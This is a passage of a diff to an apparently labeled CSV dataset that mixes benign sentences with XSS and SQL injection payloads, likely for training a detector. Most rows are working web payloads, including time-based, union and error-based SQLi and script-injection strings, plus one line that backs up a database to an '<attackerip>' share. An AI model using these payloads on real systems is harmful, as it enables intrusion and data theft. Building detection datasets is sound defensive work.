ontransitionrun=alert(1)></div>",1,XSS,5278 +Where's the best place to go for a run?,0,normal,23685 +"""),(select%20if(count(*)!=-1,benchmark(3000000,MD5(1)),benchmark(3000000,MD5(1))))/*",2,SQLi,10924 +Select stay.,0,normal,24601 +<ruby onblur=alert(1) tabindex=1 id=x></ruby><input autofocus>,1,XSS,1792 +1' ) where 1115 = 1115,2,SQLi,19462 +-5742' where 1314 = 1314 or 5903 = ( 'qqpjq'|| ( select case 5903 when 5903 then 1 else 0 end from rdb$database ) ||'qzvzq' ) --,2,SQLi,12078 +Choosing baby monitors for your home requires research so that you can make sure to select the best monitor for your home that fits your needs.,0,normal,26241 +eval(URL.slice(-8))>#alert(1),1,XSS,9321 +<isindex type=image src=1 onerror=alert(XSS)>,1,XSS,305 +"-4379' union all select 1648,1648,1648,1648,1648,1648,1648#",2,SQLi,18348 +"+if(benchmark(3000000,MD5(1)),NULL,NULL))%20--",2,SQLi,10856 +-5250 ) where 1591 = 1591 or 5903 = ( 'qqpjq'|| ( select case 5903 when 5903 then 1 else 0 end from rdb$database ) ||'qzvzq' ) --,2,SQLi,19753 +"UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24",2,SQLi,10658 +"-9772' or 5023 = ctxsys.drithsx.sn ( 5023, ( chr ( 113 ) ||chr ( 113 ) ||chr ( 112 ) ||chr ( 106 ) ||chr ( 113 ) || ( select ( case when ( 5023 = 5023 ) then 1 else 0 end ) from dual ) ||chr ( 113 ) ||chr ( 122 ) ||chr ( 118 ) ||chr ( 122 ) ||chr ( 113 ) ) ) and 'igaa' = 'igaa",2,SQLi,14723 +"<style>@keyframes slidein {}</style><optgroup style=""animation-duration:1s;animation-name:slidein;animation-iteration-count:2"" onanimationiteration=""alert(1)""></optgroup>",1,XSS,8887 +"<script src=data:text/javascript;base64,&#x59;&#x57;&#x78;&#x6c;&#x63;&#x6e;&#x51;&#x6f;&#x4d;&#x53;&#x6b;&#x3d;></script>",1,XSS,197 +"When the annotations tool bar opens, select the pen tool.",0,normal,25116 +"1 ) as tgqd where 6369 = 6369 and 6055 = ctxsys.drithsx.sn ( 6055, ( chr ( 113 ) ||chr ( 113 ) ||chr ( 112 ) ||chr ( 106 ) ||chr ( 113 ) || ( select ( case when ( 6055 = 6055 ) then 1 else 0 end ) from dual ) ||chr ( 113 ) ||chr ( 122 ) ||chr ( 118 ) ||chr ( 122 ) ||chr ( 113 ) ) ) --",2,SQLi,14667 +Grab a free Google Home Mini with the purchase of select Tile Bluetooth Tracker 4-Packs See Details Get a $39 Amazon Echo Dot for free when you buy select Tile 4-Packs.,0,normal,26091 +Where's the addiction counselor,0,normal,23632 +"-8069 ) ) as sxbn where 7689 = 7689 union all select 7689,7689,7689,7689,7689,7689,7689,7689,7689,7689--",2,SQLi,18802 +<input onblur=alert(1) id=x><input autofocus>,1,XSS,7318 +"<div id=""122""><iframe sandbox=""allow-same-origin allow-forms allow-scripts"" src=""http://example.org/""></iframe>//[""'`-->]]>]</div>",1,XSS,9057 +select ( case when ( 1412 = 5313 ) then 1412 else 1412* ( select 1412 from mysql.db ) end ) #,2,SQLi,13956 +She chose a beautiful dress for the occasion.,0,normal,23811 +Order a refreshing drink.,0,normal,22662 +"1"" ) ) ) and 8407 = ( select count ( * ) from generate_series ( 1,5000000 ) ) and ( ( ( ""ynwr"" like ""ynwr",2,SQLi,22352 +<listing onfocusout=alert(1) tabindex=1 id=x></listing><input autofocus>,1,XSS,7088 +<multicol onpointerdown=alert(1)>XSS</multicol>,1,XSS,6204 +"<frameset onBlur frameset onBlur=""javascript:javascript:alert(1)""></frameset onBlur>",1,XSS,381 +select sleep ( 5 ) and ( 1435 = 1435,2,SQLi,17051 +"<optgroup onmouseover=""alert(1)"">test</optgroup>",1,XSS,1715 +ORDER BY 8,2,SQLi,10206 +1 where 9393 = 9393 waitfor delay '0:0:5'--,2,SQLi,21896 +"1 where 7757 = 7757 and updatexml ( 3393,concat ( 0x2e,0x7171706a71, ( select ( elt ( 3393 = 3393,1 ) ) ) ,0x717a767a71 ) ,1161 ) --",2,SQLi,22305 +"`'><script>\xE2\x80\x85javascript:alert(509)</script> +`'><script>\xE2\x80\x86javascript:alert(1)</script>",1,XSS,8926 +); alert('XSS,1,XSS,1224 +"<form><input type=search onsearch=alert(1) value=""Hit return"" autofocus>",1,XSS,97 +<table onpointerover=alert(1)>XSS</table>,1,XSS,2451 +Delete the outdated files.,0,normal,22634 +1' ) where 5279 = 5279 or sleep ( 5 ) #,2,SQLi,16794 +Select a suitable color for your lighting condition or your preference.,0,normal,25619 +"1%"" ) or extractvalue ( 1297,concat ( 0x5c,0x7171706a71, ( select ( elt ( 1297 = 1297,1 ) ) ) ,0x717a767a71 ) ) and ( ""%"" = """,2,SQLi,18615 +"<summary draggable=""true"" ondragenter=""alert(1)"">test</summary>",1,XSS,7718 +"<progress onkeyup=""alert(1)"" contenteditable>test</progress>",1,XSS,5313 +"<s onbeforecut=""alert(1)"" contenteditable>test</s>",1,XSS,2916 +"In 1845, however, a statute based on the recommendations of a select committee, appointed in the preceding year, was passed; the object being to diminish the bulk of the special acts, and to introduce uniformity into private bill legislation by classifying the common form clauses, embodying them in general statutes, and facilitating their incorporation into the special statutes by reference.",0,normal,25978 +"UNION ALL SELECT @@VERSION,USER(),SLEEP(5),BENCHMARK(1000000,MD5('A')),NULL,NULL,NULL,NULL,NULL--",2,SQLi,10550 +"<style>@keyframes x{from {left:0;}to {left: 1000px;}}:target {animation:10s ease-in-out 0s 1 x;}</style><button id=x style=""position:absolute;"" onanimationcancel=""alert(1)""></button>",1,XSS,2409 +"<kbd onbeforecopy=""alert(1)"" contenteditable>test</kbd>",1,XSS,8484 +Select your establish.,0,normal,24965 +"1"" ) ) as ydkd where 2455 = 2455 and sleep ( 5 ) --",2,SQLi,14224 +<x contenteditable onkeydown=alert(1)>press any key!,1,XSS,9285 +<button onDragLeave=javascript:alert(1)>,1,XSS,9572 +1' ) ) rlike sleep ( 5 ) and ( ( 'iwct' = 'iwct,2,SQLi,12132 +1'|| ( select 'nwve' where 7721 = 7721,2,SQLi,18209 +( 1589 = 1589 ) *1,2,SQLi,12053 +"<footer onmouseover=""alert(1)"">test</footer>",1,XSS,7656 +"1 ) where 9213 = 9213 and 8189 = ( select count ( * ) from sysibm.systables as t1,sysibm.systables as t2,sysibm.systables as t3 ) --",2,SQLi,21922 +"select like ( 'abcdefg',upper ( hex ( randomblob ( 500000000/2 ) ) ) )",2,SQLi,21029 +or sleep(__TIME__)#,2,SQLi,10040 +"1'|| ( select 'drna' from dual where 5082 = 5082 and 3824 = benchmark ( 5000000,md5 ( 0x76555642 ) ) ) ||'",2,SQLi,22042 +<td id=x tabindex=1 onbeforeactivate=alert(1)></td>,1,XSS,6815 +Where's the farmhouse?,0,normal,23532 +"1%"" ) and ( 3020 = 3020 ) *6703 and ( ""%"" = """,2,SQLi,12352 +"<style>:target {color:red;}</style><u id=x style=""transition:color 1s"" ontransitionend=alert(1)></u>",1,XSS,1979 +"<style>:target {color:red;}</style><label id=x style=""transition:color 1s"" ontransitionend=alert(1)></label>",1,XSS,2745 +"1 where 2751 = 2751 union all select null,null,null,null--",2,SQLi,15530 +<output onpointermove=alert(1)>XSS</output>,1,XSS,6098 +1' ) ) ) waitfor delay '0:0:5' and ( ( ( 'clcf' = 'clcf,2,SQLi,18931 +and 1=0) union all,2,SQLi,10960 +<isindex onpointerdown=alert(1)>XSS</isindex>,1,XSS,3345 +"1"" and sleep ( 5 ) #",2,SQLi,17224 +"<picture ondblclick=""alert(1)"">test</picture>",1,XSS,7678 +Where's the best place to find unique items?,0,normal,23865 +"<colgroup draggable=""true"" ondragenter=""alert(1)"">test</colgroup>",1,XSS,2948 +"<style>@keyframes x{}</style><kbd style=""animation-name:x"" onanimationstart=""alert(1)""></kbd>",1,XSS,8396 +"1'|| ( select 'goxu' where 9215 = 9215 and char ( 109 ) ||char ( 79 ) ||char ( 70 ) ||char ( 90 ) = regexp_substring ( repeat ( right ( char ( 5012 ) ,0 ) ,5000000000 ) ,null ) --",2,SQLi,14951 +Select the tool (next to the color selection area) and the drawing tool will fill in the color to match whatever area of your photo you select.,0,normal,25540 +declare @q nvarchar ( 200 ) select @q = 0x770061006900740066006F0072002000640065006C00610079002000270030003A0030003A0031003000270000 exec ( @q ),2,SQLi,11401 +( select * from ( select ( sleep ( 5 ) ) ) srmq ) # gkkx,2,SQLi,17991 +"<div id=""120""><script>function makePopups(){for (i=1;i<6;i++) {window.open('popup.html','spam'+i,'width=50,height=50');}}</script>",1,XSS,9055 +"1"" ) where 7165 = 7165 or 8466 = benchmark ( 5000000,md5 ( 0x694a4745 ) ) --",2,SQLi,12695 +1' ) ) as pqbq where 1865 = 1865,2,SQLi,13973 +Select your negotiate.,0,normal,25018 +"1%"" or 1022 = ( select count ( * ) from all_users t1,all_users t2,all_users t3,all_users t4,all_users t5 ) --",2,SQLi,12051 +<col id=x tabindex=1 ondeactivate=alert(1)></col><input id=y autofocus>,1,XSS,8367 +1'+ ( select aqhj where 4419 = 4419,2,SQLi,14401 +1' in boolean mode ),2,SQLi,19475 +"-6381%"" ) ) ) union all select 1503,1503,1503,1503#",2,SQLi,17860 +Select the right filter for the photo.,0,normal,24188 +-1730' or 8571 = 8571--,2,SQLi,16350 +<&#x6A&#x61&#x76&#x61&#x73&#x63&#x72&#x69&#x70&#x74&#x3A&#x61&#x6C&#x65&#x72&#x74&#x28&#x27&#x58&#x53&#x53&#x27&#x29>,1,XSS,9359 +<X OnXxx=1,1,XSS,9004 +"1%"" ) ) ) or 7417 = ( select count ( * ) from sysibm.systables as t1,sysibm.systables as t2,sysibm.systables as t3 ) --",2,SQLi,14943 +"<u ondblclick=""alert(1)"">test</u>",1,XSS,2067 +"call regexp_substring ( repeat ( right ( char ( 3702 ) ,0 ) ,500000000 ) ,null ) and ( ( ( ""%"" = """,2,SQLi,17094 +1 where 3502 = 3502 order by 1--,2,SQLi,15845 +%' RLIKE SLEEP(5) AND '1337%'='1337,2,SQLi,11154 +"<area onmousemove=""alert(1)"">test</area>",1,XSS,8615 +"1"" ) ) as iqgd where 7611 = 7611 union all select null,null,null,null,null#",2,SQLi,21781 +<bdi onblur=alert(1) tabindex=1 id=x></bdi><input autofocus>,1,XSS,5569 +"<div id=""98""><div id=d><div style=""font-family:'sans\27\2F\2A\22\2A\2F\3B color\3Ared\3B'"">X</div></div>",1,XSS,9104 +<keygen onblur=alert(1) tabindex=1 id=x></keygen><input autofocus>,1,XSS,3275 +Select your group.,0,normal,24831 +-4410 where 5749 = 5749 or 1317 = 9823--,2,SQLi,15994 +"1"" ) ) ) and sleep ( 5 ) and ( ( ( ""fdvc"" like ""fdvc",2,SQLi,18146 +1 where 3027 = 3027 and 4595 = 4595#,2,SQLi,21465 +"<blockquote draggable=""true"" ondragenter=""alert(1)"">test</blockquote>",1,XSS,6024 +<multicol id=x tabindex=1 ondeactivate=alert(1)></multicol><input id=y autofocus>,1,XSS,5585 +"1'|| ( select 'fcws' from dual where 9184 = 9184 and updatexml ( 3393,concat ( 0x2e,0x7171706a71, ( select ( elt ( 3393 = 3393,1 ) ) ) ,0x717a767a71 ) ,1161 ) ) ||'",2,SQLi,14635 +Join the chat.,0,normal,22830 +<frame onfocusout=alert(1) tabindex=1 id=x></frame><input autofocus>,1,XSS,3040 +"<style>@keyframes slidein {}</style><tfoot style=""animation-duration:1s;animation-name:slidein;animation-iteration-count:2"" onanimationiteration=""alert(1)""></tfoot>",1,XSS,2175 +"During deposition, Trump has admitted that he did not select instructors.",0,normal,26180 +"-3361 ) ) union all select 2827,2827,2827,2827#",2,SQLi,12347 +"-6580' ) union all select 9950,9950,9950,9950,9950,9950--",2,SQLi,17685 +"-2120"" ) union all select 9614--",2,SQLi,20280 +1 ) where 6424 = 6424,2,SQLi,18670 +Save up to 25% on select grills and pool supplies,0,normal,25683 +Will the Whips try to strangle independence on the new select committees by putting party stooges in as chairs.,0,normal,25084 +"union ( select NULL, NULL, NULL, NULL, ( select @@version ) ) --",2,SQLi,11791 +"1%' ) ) ) and ( select 9067 from ( select count ( * ) ,concat ( 0x7171706a71, ( select ( elt ( 9067 = 9067,1 ) ) ) ,0x717a767a71,floor ( rand ( 0 ) *2 ) ) x from information_schema.character_sets group by x ) a ) and ( ( ( '%' = '",2,SQLi,15819 +"<spacer oncopy=""alert(1)"" contenteditable>test</spacer>",1,XSS,6886 +"<XML SRC=""xsstest.xml"" ID=I></XML> <SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML></SPAN>",1,XSS,284 +<time onpointerout=alert(1)>XSS</time>,1,XSS,5054 +"-4817 union all select 7415,7415,7415,7415,7415,7415,7415,7415,7415#",2,SQLi,12322 +Select pizza.,0,normal,24460 +"1%"" ) or sleep ( 5 ) #",2,SQLi,20122 +"<i onkeypress=""alert(1)"" contenteditable>test</i>",1,XSS,2453 +"-1869"" ) ) ) union all select 7122,7122,7122,7122,7122,7122,7122,7122,7122--",2,SQLi,16599 +"and (select substring(@@version,3,1))='c'",2,SQLi,10240 +1' ) ) and 3715 in ( ( char ( 113 ) +char ( 113 ) +char ( 112 ) +char ( 106 ) +char ( 113 ) + ( select ( case when ( 3715 = 3715 ) then char ( 49 ) else char ( 48 ) end ) ) +char ( 113 ) +char ( 122 ) +char ( 118 ) +char ( 122 ) +char ( 113 ) ) ) and ( ( 'mmow' = 'mmow,2,SQLi,14737 +"-3862' ) ) union all select 2495,2495,2495,2495,2495,2495,2495--",2,SQLi,15076 +It remains $9 and is only available on select flights.,0,normal,25912 +"select * from users where id = 1 *1 union select 1,banner from v$version where rownum = 1 -- 1",2,SQLi,11377 +"1 where 1096 = 1096 and extractvalue ( 7982,concat ( 0x5c,0x7171706a71, ( select ( elt ( 7982 = 7982,1 ) ) ) ,0x717a767a71 ) ) --",2,SQLi,12194 +"""),NULL,NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20'%20--",2,SQLi,10793 +"`'><script>\x21javascript:alert(1)</script> +`'><script>\x2Bjavascript:alert(1)</script>",1,XSS,9509 +"<dialog onclick=""alert(1)"">test</dialog>",1,XSS,3861 +1 or ( select * from ( select ( sleep ( 5 ) ) ) ydpu ) -- paxv,2,SQLi,12499 +"<audio draggable=""true"" ondragend=""alert(1)"">test</audio>",1,XSS,1739 +"select * from users where id = '1' + 1||1 union select 1,banner from v$version where rownum = 1 -- 1'",2,SQLi,11641 +<base href=//0>,1,XSS,9023 +"UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25#",2,SQLi,10719 +"&lt;SCRIPT a=\""&gt;\"" SRC=\""http&#58;//ha&#46;ckers&#46;org/xss&#46;js\""&gt;&lt;/SCRIPT&gt;",1,XSS,997 +"1 ) ) union all select null,null,null,null,null,null,null,null#",2,SQLi,20195 +"><script+src=http://api.m.sm.cn/rest?method=tools.sider&callback=jsonp_1869510867%3balert(1)%2f%2f794""></script>",1,XSS,9756 +<samp onpointerover=alert(1)>XSS</samp>,1,XSS,3169 +Select your favorite team.,0,normal,24281 +"<script\x0Dtype=""text/javascript"">javascript:alert(1);</script>",1,XSS,336 +"<nav onmouseout=""alert(1)"">test</nav>",1,XSS,6070 +Select there.,0,normal,24448 +"</style>//[""'`-->]]>]</div>",1,XSS,8980 +<footer id=x tabindex=1 onbeforedeactivate=alert(1)></footer><input autofocus>,1,XSS,4346 +-6540' ) where 5019 = 5019 or ( 8459 = 8459 ) *4906--,2,SQLi,21237 +"1' ) ) ) and 2388 = benchmark ( 5000000,md5 ( 0x6d457153 ) ) #",2,SQLi,12739 +Filter data where required.,0,normal,23440 +<button onAfterPrint=javascript:alert(1)>,1,XSS,9542 +"1'|| ( select 'jfxs' from dual where 5485 = 5485 and char ( 109 ) ||char ( 79 ) ||char ( 70 ) ||char ( 90 ) = regexp_substring ( repeat ( right ( char ( 5012 ) ,0 ) ,5000000000 ) ,null ) --",2,SQLi,19505 +Let's find out where the nearest pharmacy is.,0,normal,23729 +"call regexp_substring ( repeat ( right ( char ( 3702 ) ,0 ) ,500000000 ) ,null ) #",2,SQLi,19551 +"-4699 ) as mymz where 3405 = 3405 or elt ( 1032 = 1032,3623 ) --",2,SQLi,16800 +<sVg><scRipt %00>alert&lpar;1&rpar; {Opera},1,XSS,791 +"<nav draggable=""true"" ondragend=""alert(1)"">test</nav>",1,XSS,8758 +"<em onclick=""alert(1)"">test</em>",1,XSS,1944 +select * from users where id = '1' or $ 1 = 1 or 1 = 1 -- 1',2,SQLi,11482 +"-2046' ) union all select 6668,6668--",2,SQLi,18236 +"1 ) ) ) and 6537 = dbms_pipe.receive_message ( chr ( 76 ) ||chr ( 116 ) ||chr ( 117 ) ||chr ( 65 ) ,5 ) and ( ( ( 6578 = 6578",2,SQLi,22137 +<spacer onpointerenter=alert(1)>XSS</spacer>,1,XSS,4081 +-3750'+ ( select alpu where 3911 = 3911 order by 1--,2,SQLi,19136 +Select a location.,0,normal,24789 +"-7236 or make_set ( 9618 = 6919,6919 )",2,SQLi,20157 +"<stylesheet xmlns=""http://www.w3.org/TR/WD-xsl"">",1,XSS,9255 +"1' ) ) as dtwh where 9633 = 9633 and char ( 109 ) ||char ( 79 ) ||char ( 70 ) ||char ( 90 ) = regexp_substring ( repeat ( right ( char ( 5012 ) ,0 ) ,5000000000 ) ,null ) --",2,SQLi,14837 +having 1 = 1--,2,SQLi,11833 +"1' ) ) ) procedure analyse ( extractvalue ( 9627,concat ( 0x5c, ( benchmark ( 5000000,md5 ( 0x4b774c75 ) ) ) ) ) ,1 ) #",2,SQLi,15128 +"1%' or 8421 = ( select count ( * ) from generate_series ( 1,5000000 ) ) and '%' = '",2,SQLi,17204 +"1%' or 7427 = dbms_pipe.receive_message ( chr ( 116 ) ||chr ( 87 ) ||chr ( 90 ) ||chr ( 109 ) ,5 ) --",2,SQLi,20680 +"-5630"" ) or 3038 = 3038",2,SQLi,17713 +"-4286%"" ) ) ) union all select 2229,2229,2229,2229,2229,2229#",2,SQLi,17553 +-5852 ) as anca where 3574 = 3574 or 3958 = 5536#,2,SQLi,17205 +"`""'><img src=xxx:x onerror\x0C=javascript:alert(1)>",1,XSS,567 +"select count ( * ) from sysibm.systables as t1,sysibm.systables as t2,sysibm.systables as t3 and ""%"" = """,2,SQLi,13885 +"<xss oncopy=alert(1) value=""XSS"" autofocus tabindex=1 style=display:block>test",1,XSS,58 +"<time onkeyup=""alert(1)"" contenteditable>test</time>",1,XSS,8300 +Where's the church?,0,normal,23498 +"1%"" ) ) union all select null,null,null,null--",2,SQLi,12909 +"<area onbeforecopy=""alert(1)"" contenteditable>test</area>",1,XSS,4475 +"<a href=""javascript\x3Ajavascript:alert(1)"" id=""fuzzelement1"">test</a>",1,XSS,408 +"1"" and ( select 9067 from ( select count ( * ) ,concat ( 0x7171706a71, ( select ( elt ( 9067 = 9067,1 ) ) ) ,0x717a767a71,floor ( rand ( 0 ) *2 ) ) x from information_schema.character_sets group by x ) a )",2,SQLi,12703 +<///style///><span %2F onmousemove='alert&lpar;1&rpar;'>SPAN,1,XSS,820 +"1%"" or elt ( 5873 = 5873,sleep ( 5 ) ) #",2,SQLi,13347 +"<font onpaste=""alert(1)"" contenteditable>test</font>",1,XSS,5850 +1 where 4785 = 4785 and 7756 = dbms_utility.sqlid_to_sqlhash ( ( chr ( 113 ) ||chr ( 113 ) ||chr ( 112 ) ||chr ( 106 ) ||chr ( 113 ) || ( select ( case when ( 7756 = 7756 ) then 1 else 0 end ) from dual ) ||chr ( 113 ) ||chr ( 122 ) ||chr ( 118 ) ||chr ( 122 ) ||chr ( 113 ) ) ) --,2,SQLi,16303 +"<style></style\x09<img src=""about:blank"" onerror=javascript:alert(1)//></style>",1,XSS,427 +<a onpointerdown=alert(1)>XSS</a>,1,XSS,3618 +"<div draggable=""true"" contenteditable>drag me</div><link ondrop=alert(1) contenteditable>drop here</link>",1,XSS,5097 +"<basefont draggable=""true"" ondragstart=""alert(1)"">test</basefont>",1,XSS,5016 +"<div style=""behaviour: url([link to code]);"">",1,XSS,1475 +""" or benchmark(10000000,MD5(1))#",2,SQLi,10747 +BACKUP database master to disks='\\<attackerip>\<attackerip>\backupdb.dat',2,SQLi,9974 +"UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9,10,11,12,13--",2,SQLi,10677 +"1 ) ) ) or 2633 = dbms_pipe.receive_message ( chr ( 112 ) ||chr ( 65 ) ||chr ( 65 ) ||chr ( 103 ) ,5 ) and ( ( ( 6312 = 6312",2,SQLi,18224 +1' where 6409 = 6409,2,SQLi,20906 +1 ) as fnpq where 5209 = 5209,2,SQLi,15916 +1 ) where 9683 = 9683,2,SQLi,22377 +"1%"" ) union all select null,null,null,null,null,null--",2,SQLi,19292 +Or when you see today a long economic expansion and good times rolling but for only a select few people in a select few cities.,0,normal,25763 +<input type=radio id=x onfocus=alert(1)>,1,XSS,7489 +I'm thinking of where to go for a creative workshop.,0,normal,23714 +1' ) as xqbq where 1619 = 1619 and 6240 = ( 'qqpjq'|| ( select case 6240 when 6240 then 1 else 0 end from rdb$database ) ||'qzvzq' ) --,2,SQLi,21803 +"1%"" ) ) ) and 2388 = benchmark ( 5000000,md5 ( 0x6d457153 ) ) #",2,SQLi,19668 +Update the software package to the latest version.,0,normal,22946 +Retrieve rows where applicable.,0,normal,23262 +"UNION SELECT @@VERSION,SLEEP(5),USER(),BENCHMARK(1000000,MD5('A')),5,6,7,8,9,10,11,12,13#",2,SQLi,10523 +"<keygen onmouseenter=""alert(1)"">test</keygen>",1,XSS,8448 +Select ensure.,0,normal,24534 +"<font onbeforepaste=""alert(1)"" contenteditable>test</font>",1,XSS,5622 +"Roebuck, for the appointment of a select committee to enquire into the conduct of the war, was carried in the House of Commons by a.",0,normal,25701 +1' ) where 5331 = 5331,2,SQLi,19764 +"<style>:target {color:red;}</style><noframes id=x style=""transition:color 1s"" ontransitionend=alert(1)></noframes>",1,XSS,5944 +1' where 2389 = 2389 and 2853 = cast ( ( chr ( 113 ) ||chr ( 113 ) ||chr ( 112 ) ||chr ( 106 ) ||chr ( 113 ) ) || ( select ( case when ( 2853 = 2853 ) then 1 else 0 end ) ) ::text|| ( chr ( 113 ) ||chr ( 122 ) ||chr ( 118 ) ||chr ( 122 ) ||chr ( 113 ) ) as numeric ) --,2,SQLi,13562 +"<video onbeforecopy=""alert(1)"" contenteditable>test</video>",1,XSS,6670 +<img/src/onerror=prompt(8)>,1,XSS,328 +"1"" ) as ltoa where 9159 = 9159 or exp ( ~ ( select * from ( select concat ( 0x7171706a71, ( select ( elt ( 6270 = 6270,1 ) ) ) ,0x717a767a71,0x78 ) ) x ) ) --",2,SQLi,19438 +"<body onPageHide body onPageHide=""javascript:javascript:alert(1)""></body onPageHide>",1,XSS,360 +"<a href=""\xC2\xA0javascript:javascript:alert(1)"" id=""fuzzelement1"">test</a>",1,XSS,470 +"-3234%"" ) ) or elt ( 1032 = 1032,3623 ) and ( ( ""%"" = """,2,SQLi,12309 +<col id=x tabindex=1 onbeforeactivate=alert(1)></col>,1,XSS,3351 +"-7564' ) as nank where 8095 = 8095 union all select 8095,8095,8095--",2,SQLi,17076 +"1%"" ) ) ) union all select null,null,null--",2,SQLi,16493 +<strong onblur=alert(1) tabindex=1 id=x></strong><input autofocus>,1,XSS,6809 +"-1985%' ) ) ) union all select 3051,3051,3051--",2,SQLi,20484 +-5031' or 9323 = 9323#,2,SQLi,18347 +<svg><cite onload=alert(1)></cite>,1,XSS,6716 +<keygen onpointerover=alert(1)>XSS</keygen>,1,XSS,6931 +"1%"" ) ) and 6283 = 2068 and ( ( ""%"" = """,2,SQLi,16426 +Update the app.,0,normal,22851 +Or select a Medicare Advantage plan that includes drug coverage.,0,normal,25762 +AS INJECTX WHERE 1=1 AND 1=1,2,SQLi,10125 +") AND 1337=BENCHMARK(5000000,MD5(0x774c5341)) AND ('1337' LIKE '1337",2,SQLi,11217 +"<div draggable=""true"" contenteditable>drag me</div><optgroup ondragover=alert(1) contenteditable>drop here</optgroup>",1,XSS,2456 +"<figure draggable=""true"" ondragenter=""alert(1)"">test</figure>",1,XSS,8577 "<a href=""\x01javascript:javascript:alert(1)"" id=""fuzzelement1"">test</a>",1,XSS,500 -"<tr onmouseenter=""alert(1)"">test</tr>",1,XSS,3691 -"select sleep ( 5 ) and ""irxg"" = ""irxg",2,SQLi,20552 -"<a href=""\x0Bjavascript:javascript:alert(1)"" id=""fuzzelement1"">test</a>",1,XSS,468 -"select like ( 'abcdefg',upper ( hex ( randomblob ( 500000000/2 ) ) ) ) # lchh",2,SQLi,14766 -or 'unusual' = 'unusual',2,SQLi,10129 -"<bdi onmousemove=""alert(1)"">test</bdi>",1,XSS,3683 -<a onpointerout=alert(1)>XSS</a>,1,XSS,6613 -"-4615' ) ) ) or elt ( 1032 = 1032,3623 ) and ( ( ( 'jipk' like 'jipk",2,SQLi,22037 -"1%"" ) ) union all select null,null,null,null--",2,SQLi,13076 -"1' ) ) ) and ( select 9067 from ( select count ( * ) ,concat ( 0x7171706a71, ( select ( elt ( 9067 = 9067,1 ) ) ) ,0x717a767a71,floor ( rand ( 0 ) *2 ) ) x from information_schema.character_sets group by x ) a ) and ( ( ( 'wzdo' = 'wzdo",2,SQLi,14323 --3566%' or 2158 = 6289,2,SQLi,20371 -"-5591%"" ) ) order by 1--",2,SQLi,15521 -"-9281 ) where 8363 = 8363 or make_set ( 8220 = 5127,5127 ) --",2,SQLi,12295 -1'|| ( select 'tisi' from dual where 1616 = 1616 and 2853 = cast ( ( chr ( 113 ) ||chr ( 113 ) ||chr ( 112 ) ||chr ( 106 ) ||chr ( 113 ) ) || ( select ( case when ( 2853 = 2853 ) then 1 else 0 end ) ) ::text|| ( chr ( 113 ) ||chr ( 122 ) ||chr ( 118 ) ||chr ( 122 ) ||chr ( 113 ) ) as numeric ) ) ||',2,SQLi,21412 -"select * from users where id = 1 union select 1`\`,version ( ) -- 1",2,SQLi,12085 -"1 and char ( 111 ) ||char ( 77 ) ||char ( 121 ) ||char ( 88 ) = regexp_substring ( repeat ( left ( crypt_key ( char ( 65 ) ||char ( 69 ) ||char ( 83 ) ,null ) ,0 ) ,500000000 ) ,null ) -- zimf",2,SQLi,13349 -<img2 onpointerleave=alert(1)>XSS</img2>,1,XSS,7004 -Select a dessert to satisfy your craving.,0,normal,24209 -"<audio onclick=""alert(1)"">test</audio>",1,XSS,2394 -"<style>@keyframes x{from {left:0;}to {left: 1000px;}}:target {animation:10s ease-in-out 0s 1 x;}</style><body id=x style=""position:absolute;"" onanimationcancel=""alert(1)""></body>",1,XSS,8073 -select ( case when ( 4205 = 9574 ) then 4205 else 1/ ( select 0 ) end ) --,2,SQLi,15248 -<svg><set onbegin=alert(1) attributename=x dur=1s>,1,XSS,6326 -"1%"" and 8407 = ( select count ( * ) from generate_series ( 1,5000000 ) ) and ""%"" = """,2,SQLi,15461 -"&lt;IMG SRC=javascript:alert(String.fromCharCode(88,83,83))&gt;",1,XSS,1373 -"1' ) ( select ( case when ( 5451 = 5451 ) then regexp_substring ( repeat ( right ( char ( 5451 ) ,0 ) ,500000000 ) ,null ) else char ( 108 ) ||char ( 76 ) ||char ( 112 ) ||char ( 116 ) end ) from information_schema.system_users ) and ( 'uzxr' = 'uzxr",2,SQLi,16069 -"1"" ) where 3390 = 3390",2,SQLi,16180 -"-2889 ) ) as iqzv where 1786 = 1786 union all select 1786,1786,1786,1786,1786,1786,1786,1786--",2,SQLi,16586 -"<command onclick=""alert(1)"">test</command>",1,XSS,2052 -"<header oncopy=""alert(1)"" contenteditable>test</header>",1,XSS,3478 -"-9587 union all select 1568,1568,1568,1568,1568,1568#",2,SQLi,21546 -<bdi onpointerover=alert(1)>XSS</bdi>,1,XSS,4274 -"<head onmousedown=""alert(1)"">test</head>",1,XSS,7726 -"-7125"" or ( 8919 = 2275 ) *2275 and ""fbwo"" = ""fbwo",2,SQLi,20922 -"1' and exp ( ~ ( select * from ( select concat ( 0x7171706a71, ( select ( elt ( 8190 = 8190,1 ) ) ) ,0x717a767a71,0x78 ) ) x ) )",2,SQLi,21536 -<blockquote id=x tabindex=1 onactivate=alert(1)></blockquote>,1,XSS,6537 -Select the perfect outfit.,0,normal,24482 -"-5728 ) where 8663 = 8663 union all select 8663,8663,8663,8663,8663,8663,8663,8663,8663,8663#",2,SQLi,17858 -TRUE,0,normal,23421 -1 ) order by 1--,2,SQLi,20567 -Create a striking masterpiece.,0,normal,22924 -OR x=y--,2,SQLi,10242 -&lt;A HREF=&quot;http://66.102.7.147/&quot;&gt;XSS&lt;/A&gt;,1,XSS,1406 -[\xC0][\xBC]script>document.vulnerable=true;[\xC0][\xBC]/script>,1,XSS,1494 -"<;DIV STYLE="";width: expression(alert(';XSS';));"";>;",1,XSS,1531 -<nav onpointerdown=alert(1)>XSS</nav>,1,XSS,2513 -"-1802%' ) ) union all select 1002,1002,1002,1002,1002,1002,1002#",2,SQLi,20951 -<blockquote id=x tabindex=1 onbeforeactivate=alert(1)></blockquote>,1,XSS,7548 -"-9840 ) ) as thod where 4790 = 4790 or 1570 = convert ( int, ( select char ( 113 ) +char ( 113 ) +char ( 112 ) +char ( 106 ) +char ( 113 ) + ( select ( case when ( 1570 = 1570 ) then char ( 49 ) else char ( 48 ) end ) ) +char ( 113 ) +char ( 122 ) +char ( 118 ) +char ( 122 ) +char ( 113 ) ) ) --",2,SQLi,17355 -"<style>:target {color:red;}</style><section id=x style=""transition:color 1s"" ontransitionend=alert(1)></section>",1,XSS,8901 -<marquee 